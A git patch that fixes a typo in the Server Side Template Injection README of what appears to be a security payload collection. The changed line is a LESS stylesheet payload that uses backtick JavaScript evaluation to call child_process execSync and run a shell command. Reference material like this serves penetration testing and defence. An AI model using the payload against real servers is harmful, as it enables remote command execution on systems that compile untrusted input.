From 6841fc21d29456eb330c8a11cff0b178384aaa92 Mon Sep 17 00:00:00 2001 From: Jeremy Buis Date: Fri, 16 Jul 2021 11:24:16 -0400 Subject: [PATCH] Update README.md Fixes a typo --- Server Side Template Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index d8d8522..1d65a24 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -569,7 +569,7 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 ```less body { - color: `global.process.mainModule.require("child_process").execSync("id"`; + color: `global.process.mainModule.require("child_process").execSync("id")`; } ```